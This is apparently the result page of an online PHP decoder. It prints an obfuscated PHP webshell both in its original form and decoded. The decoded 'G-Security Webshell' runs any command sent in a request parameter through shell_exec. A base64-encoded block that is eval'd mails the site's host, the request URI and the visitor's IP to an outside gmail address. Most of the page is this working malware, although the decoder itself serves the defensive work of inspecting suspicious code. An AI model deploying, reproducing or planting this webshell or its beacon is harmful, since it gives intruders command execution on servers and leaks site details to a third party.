Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $OOO000000=urldecode('%66%67%36%73%62%65%68%70%72%61%34%63%6f%5f%74%6e%64');$OOO0000..

Decoded Output download

echo '<html>
<head>
<title>G-Security Webshell</title>
</head>

<body bgcolor=#000000 text=#ffffff ">
<form method=POST>
<br>
<input type=TEXT name="-cmd" size=64 value="';echo $cmd;echo '" 
style="background:#000000;color:#ffffff;">
<hr>
<pre>
';$cmd = $_REQUEST["-cmd"];;echo '';if($cmd != "") print $GLOBALS['IIIIIIIIIIIl']($cmd);;echo '</pre>
</form>
</body>
</html
';
$IIIIIIIIIII1 = "JHZpc2l0YyA9ICRfQ09PS0lFWyJ2aXNpdHMiXTsKaWYgKCR2aXNpdGMgPT0gIiIpIHsKICAkdmlzaXRjICA9IDA7CiAgJHZpc2l0b3IgPSAkX1NFUlZFUlsiUkVNT1RFX0FERFIiXTsKICAkd2ViICAgICA9ICRfU0VSVkVSWyJIVFRQX0hPU1QiXTsKICAkaW5qICAgICA9ICRfU0VSVkVSWyJSRVFVRVNUX1VSSSJdOwogICR0YXJnZXQgID0gcmF3dXJsZGVjb2RlKCR3ZWIuJGluaik7CiAgJGp1ZHVsICAgPSAiMTc4LUJsYWNrIGh0dHA6Ly8kdGFyZ2V0IGJ5ICR2aXNpdG9yIjsKICAkYm9keSAgICA9ICJCdWc6ICR0YXJnZXQgYnkgJHZpc2l0b3IgLSAkdXNlciAtICRhdXRoX3Bhc3MiOwogIGlmICghZW1wdHkoJHdlYikpIHsgQG1haWwoImhhcmR3YXJlaGVhdmVuLmNvbUBnbWFpbC5jb20iLCRqdWR1bCwkYm9keSwkdXNlciwkYXV0aF9wYXNzKTsgfQp9CmVsc2UgeyAkdmlzaXRjKys7IH0KQHNldGNvb2tpZSgidmlzaXR6IiwkdmlzaXRjKTs=";
eval($GLOBALS['IIIIIIIIIIlI']($IIIIIIIIIII1));
;

Did this file decode correctly?

Original Code

<?php $OOO000000=urldecode('%66%67%36%73%62%65%68%70%72%61%34%63%6f%5f%74%6e%64');$OOO0000O0=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5};$OOO0000O0.=$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};$OOO0000O0.=$OOO0000O0{3}.$OOO000000{11}.$OOO000000{12}.$OOO0000O0{7}.$OOO000000{5};?><?php eval($GLOBALS['OOO0000O0']('JElJSUlJSUlJSUlsST0nYmFzZTY0X2RlY29kZSc7JElJSUlJSUlJSUlJbD0nc2hlbGxfZXhlYyc7')); ?><?php /* [email protected] */$OOO000O00=$OOO000000{0}.$OOO000000{12}.$OOO000000{7}.$OOO000000{5}.$OOO000000{15};$O0O000O00=$OOO000000{0}.$OOO000000{1}.$OOO000000{5}.$OOO000000{14};$O0O000O0O=$O0O000O00.$OOO000000{11};$O0O000O00=$O0O000O00.$OOO000000{3};$O0O00OO00=$OOO000000{0}.$OOO000000{8}.$OOO000000{5}.$OOO000000{9}.$OOO000000{16};$OOO00000O=$OOO000000{3}.$OOO000000{14}.$OOO000000{8}.$OOO000000{14}.$OOO000000{8};$OOO0O0O00=__FILE__;$OO00O0000=0x5b4;eval($OOO0000O0('JE8wMDBPME8wMD0kT09PMDAwTzAwKCRPT08wTzBPMDAsJ3JiJyk7JE8wTzAwT08wMCgkTzAwME8wTzAwLDB4NTBlKTskT08wME8wME8wPSRPT08wMDAwTzAoJE9PTzAwMDAwTygkTzBPMDBPTzAwKCRPMDAwTzBPMDAsMHgxN2MpLCdhM21MZS84SVdRNFpyZjl3YmNWcDI3RW82SFlYU3N1akNKTU5La1AweFRSMXlkaDVCQWx2RFUrcUdpRm5PZ3R6PScsJ0FCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaYWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXowMTIzNDU2Nzg5Ky8nKSk7ZXZhbCgkT08wME8wME8wKTs='));return;?>hh]VRWJXQegwrL3wrL3wrLUvsIQjSP7BX8/NHVC0oUg8V2A/oUO0ZmW0WMGKpDgwreOBpvaBZMW0WMBKpDgwrLaBreOB4mcwpDOBrLaBreOxQeOBpvaBpDOBrmCKpvaBreOBpvaBZmcwpvaBpvaBrLaTZmsJr+UrHVOGV7scf/TlHNkq6PfESLWqcEO+V/k62qfUYKf4p2iZYUaBu/cVrokKYL7mbEA+c/21S2sTcPiwHqcFwVSyQD/mbDc/cKsWV2TZpeU9pU3c2kf277HoE/kY6EQNH87PH+JTYPdyXEi5SI/lSqcUs0sGuoxBrpWvfL2+fvCi4lO04VKT9+HNX8gvHVCKpvaBreOBpvaB4pdksP/y4mcwpvaBpvaBpvaT9B==HEfxXla0w8JDXEBtLbxOY87JHLGfmNADYocyHpiIZ7fk6q7lYociW/sk60fxHEAywmgDYocyHpGfmNB5Y87JHLGfmCD4w8Q5HIKC6PsNX+A5SNDNrLaBrLaBWIckuIbgW+HPHPHPHMaMwCD4w8H5SPDCXE7DY8gKw73w2UbtLbxO60WtLbxOYEiBsobCsIkBHpU2c7J2W8iJXE2gWMUNXEbMWIfTuP2gfNbCsP/ysE2gWMSnHEfxXlaK6+UK9+7NY8OCQlWCLbTvsIkyHpDM6P/NY+slXq7hHLxNrLaBrLaB9+f5X8gl9MfPHPHPHP6nWNGfmNAxSNGfmNABSP2tLbx09lcNXEbCwVaKoUQ/277/2UcXWMUNXEbMopynHEfxXla0QvdTHMCK6+UKWmegWmWM4V3BSPkhsmaKcDAwbK/r2Uy0V2kQV2kQV2kQV2kyQUDxQ8fdHmKn9+7NY8OCQvB5SIQkwCD4wmgPXqQdwCD4wmgMX+ciwCD4wmgxs8UyLbx09BxKV2kQV2kQV2kQV2KAWLDCWKTWE03NrPBBEok392kL2PHcrLkb2v3ycksiVNQJEeiBHeJfY7J2SDdJ7Uk0VDfVrP/6p03KcDU02/bBHDkTVo3QVIfZV2f3Y+cdXITJE/QRV2f392kebpsLY2/0VKJYS8rlXL3MrDk02/f3YUCApKH7X/T87EAvY7717Ki2r7Q8EL38c7Q8VEk67IfZV2f3Y+bl7PkQbD/0V2f392kL2PH7r/Hp7PdE2UsiVKkEckQcEL3x2/2A2Ek67IfZV2f3Y+/ofo/QbD/0V2f392kL2PH7r/Hp7PdE2UsiVkfV7KHE2kH977CA7kfp2DTKpqs5HDkL2N3HEeThEkJcHDker8sNX26vH/J4SUTI7PTMrkQyVDfVrUToVo74c+AU6Ek1fDfTbEs4cqaAEKJESDkLbEsb2D/Tp7cNfeA7V0fH7DilV2sxr8cWbpHrupJ1Hes8u7xl7N3QcDxUV2fVrP/6p03KcvkiVETvVDkLbEdHXpk1H7f3HDkLbpkQbDTLH/sNfKkL2N3HEeThEkJcHUkhY+s4V/TB6vQyr8WvVEsr2D/1H/J9X8fTbocQbUQxH/JVXUCvbPJNrDUTpqs5HDkIX8UQb+sxEkSAs+cWY+g4V8cyEEk1SekWS+sccv/x67sqXDkdY8JNX7WvE7J4X8/I7PJKX7HUp8U9sPQ7bPiM7DHB6KrUYPWlr8krbUQAH/sVrEQLs+dHXpk1H7fqY+c6pPANYos1E7JEr8/89osHEeiFVUcvH+HcSLkLX7Hv6vQ7H+7ibEdKXEAF67JVYKdiSvsQVL3Z22J9X8cIp0HMr0cBEkf0YEcdXITJE/W+VEkqY+cdXITJE/QRVUcvwVWnmP7+6EBxQesrpDQ3p/fXQDkQV2kQV2kQV2kyVVss4mcQV2kQV2kQV2kQVpeT4py49B==khAwFv@Fr`uLrpSm

Function Calls

fopen 1
fread 3
strtr 2
fclose 1
urldecode 1
str_replace 1
base64_decode 4

Variables

$O000O0O00 True
$O0O000O00 fgets
$O0O000O0O fgetc
$O0O00OO00 fread
$OO00O0000 1460
$OO00O00O0 echo '<html> <head> <title>G-Security Webshell</title> </..
$OOO000000 fg6sbehpra4co_tnd
$OOO00000O strtr
$OOO0000O0 base64_decode
$OOO000O00 fopen
$OOO0O0O00 index.php
$IIIIIIIIIIIl shell_exec
$IIIIIIIIIIlI base64_decode

Stats

MD5 6b3305302a8011978eb2377ea41cf317
Eval Count 4
Decode Time 163 ms